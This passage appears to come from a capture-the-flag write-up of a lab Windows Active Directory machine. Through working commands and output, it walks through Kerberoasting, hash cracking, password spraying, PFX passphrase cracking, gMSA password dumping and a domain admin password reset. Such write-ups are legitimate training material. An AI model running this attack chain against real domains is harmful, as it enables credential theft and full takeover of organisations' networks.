NT_STATUS_ACCESS_DENIED listing \trace.ryan\Desktop\*
\trace.ryan\Documents
NT_STATUS_ACCESS_DENIED listing \trace.ryan\Documents\*
\trace.ryan\Downloads
NT_STATUS_ACCESS_DENIED listing \trace.ryan\Downloads\*
\hope.sharp\Desktop\$RECYCLE.BIN
. DHSc 0 Thu Apr 9 10:35:49 2020
.. DHSc 0 Thu Apr 9 10:35:49 2020
desktop.ini AHSc 129 Thu Apr 9 10:35:49 2020
\hope.sharp\Documents\$RECYCLE.BIN
. DHSc 0 Thu Apr 9 10:35:51 2020
.. DHSc 0 Thu Apr 9 10:35:51 2020
desktop.ini AHSc 129 Thu Apr 9 10:35:51 2020
\hope.sharp\Downloads\$RECYCLE.BIN
. DHSc 0 Thu Apr 9 10:35:49 2020
.. DHSc 0 Thu Apr 9 10:35:49 2020
desktop.ini AHSc 129 Thu Apr 9 10:35:50 2020
\sierra.frye\Desktop\$RECYCLE.BIN
. DHSc 0 Tue Apr 7 14:03:59 2020
.. DHSc 0 Tue Apr 7 14:03:59 2020
desktop.ini AHSc 129 Tue Apr 7 14:04:00 2020
smb: \> get sierra.frye\Desktop\user.txt
NT_STATUS_ACCESS_DENIED opening remote file \sierra.frye\Desktop\user.txt
All of this leads to nowhere except that we know ‘sierra.frye’ has the user flag, so this user is probably the next step to a lateral movement.
Given the users we got from enum4linux, let's use it and attempt to get the SPN tickets:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ impacket-GetUserSPNs -request -usersfile dom_userlist.txt -dc-ip research.search.htb 'search.htb/hope.sharp:IsolationIsKey?'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$krbtgt$SEARCH.HTB$*krbtgt*$0820014f34b455d3c07b50dd$98d076c059a11e9b8f0995e1fe065a5965a3053317321fc1ca2c82136a129aa1ead67b05196d537eec67e44e9a035862e7e5f3c3bace1ecc3f6ee096d61053ca55496b16c5d39043c4801b7fd931d0598fbe4dbc14552cd71ac1928a833ae045ebf4abef2cf7bc8a4bc00a58309a7548018d28882818dd446349e4c712cf0c05a191f0f2ceb3f60674fb5202f9cf7e7fa23241ff97f8a6c19f7d6ad9b98502f064987d79cf21c3c55ea52d4ead445c87f21a7ebbe8349ae8e05330e7d5cb40150435b707e28b17b4024e09ee16e12d38b6c921d9f6d90ecef10a1aedc505180fc1b6873efd76fcdc7069bb11f4675912964039229fa988b80225afc77fd93eea180f59b639f4dc9fa99d47aa40ccc77ce665a543239007cac7ebd53d055dc28e89c6694727f978577ac2b7076854aacb7b6e308ab1012023db472f36a7f393adae99d12e34be65ad854e47dabbae6c7f0c505e46cc0bebbbc3e0717b9f4cf567b0b830521d76670ea1ef6ed843db43918ece9e1c0bab07000d09ed800f07edf2a2d78cdb147778ff248c2a159eceecd89cfd362b9edb083d74f66afbc29459915ba431cd4a837dd790bd8f7ef3dd67c0f697ad816c14eb1542b14390fd79a486788894827098f191aa54b0c85d33af817e17d9baaf3556bb006b521ba7c99f7e4e11e4ce09a773bc43eb8ffba1053fa24dbc05d0f600d75e4b298115ff2820538ac1e6f7b6611b5e46f95e81985d326a0b51333b591564e898a1bb3e8fb2f9a27744d737b80291179d931329986748166798e861e552470514756cfc9395fcd55294f2a096a0f1a915985e6691fbd95e10b834ea39de65b296d75f6dedf5a062cac4407ab427a9ab2729c83e866af231daefd1451af59bfe798f0202a891aac9c630bbcf5ca8f68023caf8cb1cd2eea3d8cbd071580692b26de02dd13023dd4be4a47c9449f8d2596bc432a49781e50b15d72eca74bb8d8e81ce24895709adde79cc4488ae29a6f1fdb5e2f5e57192a8138b4df17e81a4df74ee64529b00b6ae83519b92da8ec0f479b294caf6fe885ec48db5c52e953e98e9358f4901f463b0ff47915523ccb4fc7d67d5b4e658518932236340b25c5f0b6fd51072f27a06de333f65737ac0db2cfd3c0d2681e6bb1f59daebf75f3d8e5a380bdc9eecbfe83e28e7ebbd3267401c56888fbdba265aeb9ff9dd005355e07648583996fdcf83783cb5701bdbaf45790467859b6b6dcee02e4a3bb5c318fa666230605fa228a500a239c1113ceb8171609a24d657f8c91403c9622c209577db4cbf8c7a45015f2e2fe174e2ce47ca0d2baec84fa3999fe2f8e750167cf3bff4348fcf03b2a853e72d261b40765427a4ecf0bb2355f8dd94a18bbe20e304cc012a01e9e9c43de198f23e4174ddc582ad4330fbdc4047dbd341be0daaa778dc81b88df83d16d580d7f675e9d173dafeb4df97da79c352cc9936c560d760806071bf7cdce872975c58eed1bf1777dae42ebdb177ffe691febb74fd5000502b272c4c2f292488
[-] Principal: Santino.Benjamin - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
...
[-] Principal: Jordan.Gregory - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*web_svc$SEARCH.HTB$web_svc*$04c3e36f83a5b31eb7372497c08833db$7cc4bec06406f0d77106c29ad0801fc3d3b4109e49bd6df91628324f50f58a3f957bd9606144bce79981b7d56693e547fa5eabdd53dcc1cac8695412ddb6ddf4b6b6448fe8ae274701768ff640d287002ed28efd18e3343ecabb2670e1856ea481ea45f7a399d334fdd1304d6b15b8c9337cd606500f61ce539d142697613920bced58d974fd9afbea0d3e2c6f8ea808559d3a2957dceadb619d21e3be3677d6b4acfb989561cc2420a99eb7f3ec12b318cd260cc8e5dcfb04266e03a6860c0d625d06b4a76d9a30c768a36fe92079930509d371b5d3867508b6689aaacc6e5bf4036d9de8170752207606352c8d57eb646a25d2d4a8abd0ae4c3597cb008256de9aac3269fb3ca1aa2e416661ee3bea1b019b804710d8c1f9b266679ca914abadcf9d71f66e42e8debdca33b26cbb4c865b2f57543e5b55f5406469ba0830e6890fa7c228448003812f4adb00de86b5c9b2d708323cc2f55609cab06a0b0bbad4079f931a210bebb6adf67899dc3ca773b36840e9fc25a14ab7ec21061f5701f005704661fbf3f588bbfc2a2b12b293a72aa3ffb1680048f6c77b494bf6b0e3a212d341964fcc8cc5d99081a3b5bf0f2f687b967fa87a20ad8fd9a7c9e910612c316a3d0a8494f230cfdef0ab26e6d3809bcb4f65ea601d6200b8f62a2018b422bcafe1a6324ec2102a3852d1a7778695081664c91a632a50b0f159e5b77b5be26832b6724a8f7b1334c87e217767d1963fe565b658b965cf97caf492f530b5ec3789ad31985d3446c5739e3d515d197bdf1a6e238facec5054a262e8706a9fe840a797ecfc10ae7e4a90cd4604dbe24ae13890ef6e8e84d62ca319ad546d73e7ec22c99a50c6210582c7d712783a541e47bc3b83203ce2c2a15419f187700e2f9e258a306749bd51c8be6dc72722a477687d8176e2ff205bbc467cdaa55c2d2d0c51ffde190e302e4ca58acd42f907b8bc8efd01332ddbd91910e34fd3ceac6bad7eb5cfc517b70e0428a25cedbce8155e511b365d3d21634ef10352fecb2b5aa22f0ddf0ad4ee4841d104b7f01a27d0e7e3c3816cb0255ee6833a37352d2e6961e24c6fd120fc8b082aff3ffc25cac65449527b153abc1500666d236d49c3a0238239a1282ac6750a6519fad5d909566692f21fd819a81674e6bf85253200f3a88a8faf2eb3c766058b3c25b8d3aa300a91b138401f315b2b5e79094fadc78871eacc8182e6a3e26a3bcb5273bbcca0a0cd88b88ff7355e656e76ba6d5cf7bb62661b77296ff203712c7d46622e6a0dc6d9a38c390a82a7efe27380ff75ac0936fbae297c7fd9830312a92adeebbf95341fbe53fce4ce55a27fb0e95795e6d5fa3fac26a34de0cb63eec71c07f56cd3efef4e239649a67359f37713d9ed94199e8df3026bfb9418af9927d92b7ce84cda6bffd7960afcffbc96fcd62e2e3fce79c1a76710433ae71ef70b90a9a6baa5d469b2f8
[-] Principal: Tristan.Davies - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: - Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Now with the SPN ticket for web_svc, let's try and crack this:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ echo '$krb5tgs$23$*web_svc$SEARCH.HTB$web_svc*$04c3e36f83a5b31eb7372497c08833db$7cc4bec06406f0d77106c29ad0801fc3d3b4109e49bd6df91628324f50f58a3f957bd9606144bce79981b7d56693e547fa5eabdd53dcc1cac8695412ddb6ddf4b6b6448fe8ae274701768ff640d287002ed28efd18e3343ecabb2670e1856ea481ea45f7a399d334fdd1304d6b15b8c9337cd606500f61ce539d142697613920bced58d974fd9afbea0d3e2c6f8ea808559d3a2957dceadb619d21e3be3677d6b4acfb989561cc2420a99eb7f3ec12b318cd260cc8e5dcfb04266e03a6860c0d625d06b4a76d9a30c768a36fe92079930509d371b5d3867508b6689aaacc6e5bf4036d9de8170752207606352c8d57eb646a25d2d4a8abd0ae4c3597cb008256de9aac3269fb3ca1aa2e416661ee3bea1b019b804710d8c1f9b266679ca914abadcf9d71f66e42e8debdca33b26cbb4c865b2f57543e5b55f5406469ba0830e6890fa7c228448003812f4adb00de86b5c9b2d708323cc2f55609cab06a0b0bbad4079f931a210bebb6adf67899dc3ca773b36840e9fc25a14ab7ec21061f5701f005704661fbf3f588bbfc2a2b12b293a72aa3ffb1680048f6c77b494bf6b0e3a212d341964fcc8cc5d99081a3b5bf0f2f687b967fa87a20ad8fd9a7c9e910612c316a3d0a8494f230cfdef0ab26e6d3809bcb4f65ea601d6200b8f62a2018b422bcafe1a6324ec2102a3852d1a7778695081664c91a632a50b0f159e5b77b5be26832b6724a8f7b1334c87e217767d1963fe565b658b965cf97caf492f530b5ec3789ad31985d3446c5739e3d515d197bdf1a6e238facec5054a262e8706a9fe840a797ecfc10ae7e4a90cd4604dbe24ae13890ef6e8e84d62ca319ad546d73e7ec22c99a50c6210582c7d712783a541e47bc3b83203ce2c2a15419f187700e2f9e258a306749bd51c8be6dc72722a477687d8176e2ff205bbc467cdaa55c2d2d0c51ffde190e302e4ca58acd42f907b8bc8efd01332ddbd91910e34fd3ceac6bad7eb5cfc517b70e0428a25cedbce8155e511b365d3d21634ef10352fecb2b5aa22f0ddf0ad4ee4841d104b7f01a27d0e7e3c3816cb0255ee6833a37352d2e6961e24c6fd120fc8b082aff3ffc25cac65449527b153abc1500666d236d49c3a0238239a1282ac6750a6519fad5d909566692f21fd819a81674e6bf85253200f3a88a8faf2eb3c766058b3c25b8d3aa300a91b138401f315b2b5e79094fadc78871eacc8182e6a3e26a3bcb5273bbcca0a0cd88b88ff7355e656e76ba6d5cf7bb62661b77296ff203712c7d46622e6a0dc6d9a38c390a82a7efe27380ff75ac0936fbae297c7fd9830312a92adeebbf95341fbe53fce4ce55a27fb0e95795e6d5fa3fac26a34de0cb63eec71c07f56cd3efef4e239649a67359f37713d9ed94199e8df3026bfb9418af9927d92b7ce84cda6bffd7960afcffbc96fcd62e2e3fce79c1a76710433ae71ef70b90a9a6baa5d469b2f8' > web_svc-krb
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ john --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt web_svc-krb
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
@3ONEmillionbaby (?)
1g 0:00:00:11 DONE (2022-04-22 14:52) 0.08960g/s 1029Kp/s 1029Kc/s 1029KC/s @4208891ncv..@#alexandra$&
Use the "--show" option to display all of the cracked passwords reliably
Session completed. Once we cracked this SPN ticket, we had no success as it has the "same level of access" as hope.sharp. Let's attempt to use it for password spraying and see if an account has that same password:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ crackmapexec smb search.htb -d SEARCH -u dom_userlist.txt -p '@3ONEmillionbaby' --continue-on-success
SMB search.htb 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:SEARCH) (signing:True) (SMBv1:False)
SMB search.htb 445 RESEARCH [-] SEARCH\Administrator:@3ONEmillionbaby STATUS_LOGON_FAILURE
...
SMB search.htb 445 RESEARCH [-] SEARCH\Marshall.Skinner:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB search.htb 445 RESEARCH [+] SEARCH\Edgar.Jacobs:@3ONEmillionbaby
SMB search.htb 445 RESEARCH [-] SEARCH\Elisha.Watts:@3ONEmillionbaby STATUS_LOGON_FAILURE
...
SMB search.htb 445 RESEARCH [-] SEARCH\:@3ONEmillionbaby STATUS_LOGON_FAILURE
We found another user with the same password as web_svc: Edgar.Jacobs:@3ONEmillionbaby
Let's see what can we see with this account:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbmap -H search.htb -u 'edgar.jacobs' -p '@3ONEmillionbaby' -d SEARCH
[+] IP: search.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
helpdesk READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
RedirectedFolders$ READ, WRITE
SYSVOL READ ONLY Logon server share
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/RedirectedFolders$ -U 'SEARCH\edgar.jacobs'%'@3ONEmillionbaby'
Try "help" to get a list of possible commands.
smb: \> cd edgar.jacobs\
smb: \edgar.jacobs\> ls
. Dc 0 Thu Apr 9 16:04:11 2020
.. Dc 0 Thu Apr 9 16:04:11 2020
Desktop DRc 0 Mon Aug 10 06:02:16 2020
Documents DRc 0 Mon Aug 10 06:02:17 2020
Downloads DRc 0 Mon Aug 10 06:02:17 2020
3246079 blocks of size 4096. 374459 blocks available
smb: \edgar.jacobs\> ls Desktop\
. DRc 0 Mon Aug 10 06:02:16 2020
.. DRc 0 Mon Aug 10 06:02:16 2020
$RECYCLE.BIN DHSc 0 Thu Apr 9 16:05:29 2020
desktop.ini AHSc 282 Mon Aug 10 06:02:16 2020
Microsoft Edge.lnk Ac 1450 Thu Apr 9 16:05:03 2020
Phishing_Attempt.xlsx Ac 23130 Mon Aug 10 06:35:44 2020
3246079 blocks of size 4096. 374459 blocks available
smb: \edgar.jacobs\> cd ..
smb: \> get edgar.jacobs\Desktop\Phishing_Attempt.xlsx
getting file \edgar.jacobs\Desktop\Phishing_Attempt.xlsx of size 23130 as edgar.jacobs\Desktop\Phishing_Attempt.xlsx (124.8 KiloBytes/sec) (average 124.8 KiloBytes/sec)
smb: \> quit
As you get to see, there is a "phishing" related spreadsheet we need to inspect and for this I did not go fancy and simply used Google Sheets:
This is what seems to be a good password list to work with and test them out once more after composing a new list:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ crackmapexec smb search.htb -d SEARCH -u phishUser -p phishPass --continue-on-success
SMB search.htb 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:SEARCH) (signing:True) (SMBv1:False)
SMB search.htb 445 RESEARCH [-] SEARCH\Payton.Harmon:;;36!cried!INDIA!year!50;; STATUS_LOGON_FAILURE
...
SMB search.htb 445 RESEARCH [-] SEARCH\Sierra.Frye:~~27%when%VILLAGE%full%00~~ STATUS_LOGON_FAILURE
SMB search.htb 445 RESEARCH [+] SEARCH\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18
SMB search.htb 445 RESEARCH [-] SEARCH\Sierra.Frye:==95~pass~QUIET~austria~77== STATUS_LOGON_FAILURE
...
SMB search.htb 445 RESEARCH [-] SEARCH\Vincent.Sutton:**24&moment&BRAZIL&members&66** STATUS_LOGON_FAILURE
And we just found the following: SEARCH\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18
Let's attempt to use this account while first testing it through smbmap:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbmap -H search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d SEARCH
[+] IP: search.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
helpdesk NO ACCESS
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
RedirectedFolders$ READ, WRITE
SYSVOL READ ONLY Logon server share
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/RedirectedFolders$ -U 'SEARCH\Sierra.Frye'%'$$49=wide=STRAIGHT=jordan=28$$18'
Try "help" to get a list of possible commands.
smb: \> ls
. Dc 0 Fri Apr 22 17:00:50 2022
.. Dc 0 Fri Apr 22 17:00:50 2022
abril.suarez Dc 0 Tue Apr 7 14:12:58 2020
Angie.Duffy Dc 0 Fri Jul 31 09:11:32 2020
Antony.Russo Dc 0 Fri Jul 31 08:35:32 2020
belen.compton Dc 0 Tue Apr 7 14:32:31 2020
Cameron.Melendez Dc 0 Fri Jul 31 08:37:36 2020
chanel.bell Dc 0 Tue Apr 7 14:15:09 2020
Claudia.Pugh Dc 0 Fri Jul 31 09:09:08 2020
Cortez.Hickman Dc 0 Fri Jul 31 08:02:04 2020
dax.santiago Dc 0 Tue Apr 7 14:20:08 2020
Eddie.Stevens Dc 0 Fri Jul 31 07:55:34 2020
edgar.jacobs Dc 0 Thu Apr 9 16:04:11 2020
Edith.Walls Dc 0 Fri Jul 31 08:39:50 2020
eve.galvan Dc 0 Tue Apr 7 14:23:13 2020
frederick.cuevas Dc 0 Tue Apr 7 14:29:22 2020
hope.sharp Dc 0 Thu Apr 9 10:34:41 2020
jayla.roberts Dc 0 Tue Apr 7 14:07:00 2020
Jordan.Gregory Dc 0 Fri Jul 31 09:01:06 2020
payton.harmon Dc 0 Thu Apr 9 16:11:39 2020
Reginald.Morton Dc 0 Fri Jul 31 07:44:32 2020
santino.benjamin Dc 0 Tue Apr 7 14:10:25 2020
Savanah.Velazquez Dc 0 Fri Jul 31 08:21:42 2020
sierra.frye Dc 0 Wed Nov 17 20:01:46 2021
trace.ryan Dc 0 Thu Apr 9 16:14:26 2020
3246079 blocks of size 4096. 374322 blocks available
smb: \> recurse
smb: \> ls sierra.frye\
. Dc 0 Wed Nov 17 20:01:46 2021
.. Dc 0 Wed Nov 17 20:01:46 2021
Desktop DRc 0 Wed Nov 17 20:08:00 2021
Documents DRc 0 Fri Jul 31 10:42:19 2020
Downloads DRc 0 Fri Jul 31 10:45:36 2020
user.txt Ac 33 Wed Nov 17 19:55:27 2021
\sierra.frye\Desktop
. DRc 0 Wed Nov 17 20:08:00 2021
.. DRc 0 Wed Nov 17 20:08:00 2021
$RECYCLE.BIN DHSc 0 Tue Apr 7 14:03:59 2020
desktop.ini AHSc 282 Fri Jul 31 10:42:15 2020
Microsoft Edge.lnk Ac 1450 Tue Apr 7 08:28:05 2020
user.txt ARc 34 Fri Apr 22 09:32:25 2022
\sierra.frye\Documents
. DRc 0 Fri Jul 31 10:42:19 2020
.. DRc 0 Fri Jul 31 10:42:19 2020
$RECYCLE.BIN DHSc 0 Tue Apr 7 14:04:01 2020
desktop.ini AHSc 402 Fri Jul 31 10:42:19 2020
\sierra.frye\Downloads
. DRc 0 Fri Jul 31 10:45:36 2020
.. DRc 0 Fri Jul 31 10:45:36 2020
$RECYCLE.BIN DHSc 0 Tue Apr 7 14:04:01 2020
Backups DHc 0 Mon Aug 10 16:39:17 2020
desktop.ini AHSc 282 Fri Jul 31 10:42:18 2020
\sierra.frye\Desktop\$RECYCLE.BIN
. DHSc 0 Tue Apr 7 14:03:59 2020
.. DHSc 0 Tue Apr 7 14:03:59 2020
desktop.ini AHSc 129 Tue Apr 7 14:04:00 2020
\sierra.frye\Documents\$RECYCLE.BIN
. DHSc 0 Tue Apr 7 14:04:01 2020
.. DHSc 0 Tue Apr 7 14:04:01 2020
desktop.ini AHSc 129 Tue Apr 7 14:04:01 2020
\sierra.frye\Downloads\$RECYCLE.BIN
. DHSc 0 Tue Apr 7 14:04:01 2020
.. DHSc 0 Tue Apr 7 14:04:01 2020
desktop.ini AHSc 129 Tue Apr 7 14:04:01 2020
\sierra.frye\Downloads\Backups
. DHc 0 Mon Aug 10 16:39:17 2020
.. DHc 0 Mon Aug 10 16:39:17 2020
search-RESEARCH-CA.p12 Ac 2643 Fri Jul 31 11:04:11 2020
staff.pfx Ac 4326 Mon Aug 10 16:39:17 2020
3246079 blocks of size 4096. 374322 blocks available
smb: \> cd sierra.frye\Desktop\
smb: \sierra.frye\Desktop\> get user.txt
getting file \sierra.frye\Desktop\user.txt of size 34 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \sierra.frye\Desktop\> cd ..\Downloads\Backups\
smb: \sierra.frye\Downloads\Backups\> get search-RESEARCH-CA.p12
getting file \sierra.frye\Downloads\Backups\search-RESEARCH-CA.p12 of size 2643 as search-RESEARCH-CA.p12 (15.0 KiloBytes/sec) (average 7.5 KiloBytes/sec)
smb: \sierra.frye\Downloads\Backups\> get staff.pfx
getting file \sierra.frye\Downloads\Backups\staff.pfx of size 4326 as staff.pfx (25.0 KiloBytes/sec) (average 13.2 KiloBytes/sec)
smb: \sierra.frye\Downloads\Backups\> quit
At this point, not only we found the user flag without a shell but we also found a PKCS12 certificate file (PFX file).
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ cat user.txt
ab0459********************bea8e6
While trying to see the content of this certificate file, we cannot as it seems to have been created with a passphrase to decrypt the private key.
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ openssl pkcs12 -info -in staff.pfx
Enter Import Password:
Can't read Password
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ pfx2john staff.pfx > staff_pfx
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ john --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt staff_pfx
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
misspissy (staff.pfx)
1g 0:00:03:39 DONE (2022-04-22 17:16) 0.004549g/s 24952p/s 24952c/s 24952C/s misssnail..missnona16
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ pfx2john search-RESEARCH-CA.p12 > search_p12
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ john --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt search_p12
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
misspissy (search-RESEARCH-CA.p12)
1g 0:00:03:41 DONE (2022-04-22 17:24) 0.004518g/s 24782p/s 24782c/s 24782C/s misssnail..missnona16
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
To use these certificate files, you will have to import them into the browser.
This will give us a Powershell session on the browser. Here we will try to get and change the Execution Policy and load PowerView into memory for future use:
While enumerating directories we bump into a Home directory from what seems to be a group managed service account (GMSA):
PS C:\users> ls
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/23/2020 7:20 AM .NET v4.5
d----- 3/23/2020 7:20 AM .NET v4.5 Classic
d----- 12/20/2021 8:34 AM Administrator
d----- 7/31/2020 10:01 AM BIR-ADFS-GMSA$
d-r--- 3/23/2020 7:07 AM Public
d----- 4/23/2022 4:23 AM Sierra.Frye
d----- 8/11/2020 8:45 AM WSEnrollmentServer
PS C:\users> With this account, we should try and enumerate the domain a little more using Bloodhound:
Using the 'Shortest PAth to Domain Admins, we can see that 'Sierra'Frye', through the inherited rights from the ITSEC group, can read the gMSA password from BIR-ADFS-GMSA. This service account has the 'Generic All' rights against 'Tristan.Davies', a domain admin, which means the account can be modified.
When we try to dump the gMSA password with Sierra.Frye we get such hash:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ python3 /opt/gMSADumper/gMSADumper.py -l search.htb -d search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18'
Users or groups who can read password for BIR-ADFS-GMSA$:
> ITSec
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f
Back to Powershell, we will try to use the 'ManagedPassword' and change Tristan.Davies password:
PS C:\users> Get-ADServiceAccount -Identity BIR-ADFS-GMSA$ -Properties 'msDS-ManagedPassword'
DistinguishedName : CN=BIR-ADFS-GMSA,CN=Managed Service Accounts,DC=search,DC=htb
Enabled : True
msDS-ManagedPassword : {1, 0, 0, 0...}
Name : BIR-ADFS-GMSA
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : 48cd6c5b-56cb-407e-ac2b-7294b5a44857
SamAccountName : BIR-ADFS-GMSA$
SID : S-1-5-21-271492789-1610487937-1871574529-1299
UserPrincipalName :
PS C:\users> $gMSA = Get-ADServiceAccount -Identity BIR-ADFS-GMSA$ -Properties 'msDS-ManagedPassword'
PS C:\users> $data = $gMSA.'msDS-ManagedPassword'
PS C:\users> $pass = ConvertFrom-ADManagedPasswordBlob $data
PS C:\users> $user = 'BIR-ADFS-GMSA$'
PS C:\users> $creds = New-Object System.Management.Automation.PSCredential $user,$pass.SecureCurrentPassword
PS C:\users> Invoke-Command -ComputerName localhost -Credential $creds -ScriptBlock {net user Tristan.Davies test /domain}
The password does not meet the password policy requirements. Check the minimum password length, password complexity
and password history requirements.
+ CategoryInfo : NotSpecified: (The password do...y requirements.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
+ PSComputerName : localhost
NotSpecified: (:String) [], RemoteException
More help is available by typing NET HELPMSG 2245.
NotSpecified: (:String) [], RemoteException
PS C:\users> Invoke-Command -ComputerName localhost -Credential $creds -ScriptBlock {net user Tristan.Davies test1234 /domain}
The command completed successfully.
PS C:\users>
Having changed the password on Tristan.Davies, we can now access the account with no issues.
Accessing the system through SMB:
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/C$ -U 'SEARCH/Tristan.Davies%test1234'
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\search.htb\C$\
smb: \> cd Users\Administrator\
smb: \Users\Administrator\> ls
. Dc 0 Mon Dec 20 03:34:49 2021
.. Dc 0 Mon Dec 20 03:34:49 2021
3D Objects DRc 0 Mon Nov 22 15:21:49 2021
AppData DHc 0 Mon Mar 23 03:07:10 2020
Application Data DHSrn 0 Mon Mar 23 03:07:10 2020
Contacts DRc 0 Mon Nov 22 15:21:49 2021
Cookies DHSrn 0 Mon Mar 23 03:07:10 2020
Desktop DRc 0 Mon Nov 22 15:21:49 2021
Documents DRc 0 Mon Nov 22 15:21:50 2021
Downloads DRc 0 Mon Nov 22 15:21:49 2021
Favorites DRc 0 Mon Nov 22 15:21:49 2021
Links DRc 0 Mon Nov 22 15:21:50 2021
Local Settings DHSrn 0 Mon Mar 23 03:07:10 2020
Music DRc 0 Mon Nov 22 15:21:49 2021
My Documents DHSrn 0 Mon Mar 23 03:07:10 2020
NetHood DHSrn 0 Mon Mar 23 03:07:10 2020
NTUSER.DAT AHn 262144 Sat Apr 23 00:56:33 2022
ntuser.dat.LOG1 AHS 8192 Mon Mar 23 03:07:10 2020
ntuser.dat.LOG2 AHS 40960 Mon Mar 23 03:07:10 2020
NTUSER.DAT{5c711dff-6c97-11ea-81f6-0050568a65c6}.TM.blf AHS 65536 Mon Mar 23 03:07:11 2020
NTUSER.DAT{5c711dff-6c97-11ea-81f6-0050568a65c6}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Mon Mar 23 03:07:10 2020
NTUSER.DAT{5c711dff-6c97-11ea-81f6-0050568a65c6}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Mon Mar 23 03:07:10 2020
ntuser.ini HSc 20 Mon Mar 23 03:07:10 2020
ntuser.pol AHSRc 480 Thu Jul 30 09:21:24 2020
Pictures DRc 0 Mon Nov 22 15:21:49 2021
Recent DHSrn 0 Mon Mar 23 03:07:10 2020
Saved Games DRc 0 Mon Nov 22 15:21:50 2021
Searches DRc 0 Mon Nov 22 15:21:49 2021
SendTo DHSrn 0 Mon Mar 23 03:07:10 2020
Start Menu DHSrn 0 Mon Mar 23 03:07:10 2020
Templates DHSrn 0 Mon Mar 23 03:07:10 2020
Videos DRc 0 Mon Nov 22 15:21:49 2021
3246079 blocks of size 4096. 409296 blocks available
smb: \Users\Administrator\> ls Desktop\
. DRc 0 Mon Nov 22 15:21:49 2021
.. DRc 0 Mon Nov 22 15:21:49 2021
desktop.ini AHS 282 Mon Nov 22 15:21:49 2021
root.txt ARc 34 Fri Apr 22 09:32:25 2022
3246079 blocks of size 4096. 411142 blocks available
smb: \Users\Administrator\> cd Desktop\
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \Users\Administrator\Desktop\> quit
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ cat root.txt
77dd4b********************8a5483
AND we got the root flag!!
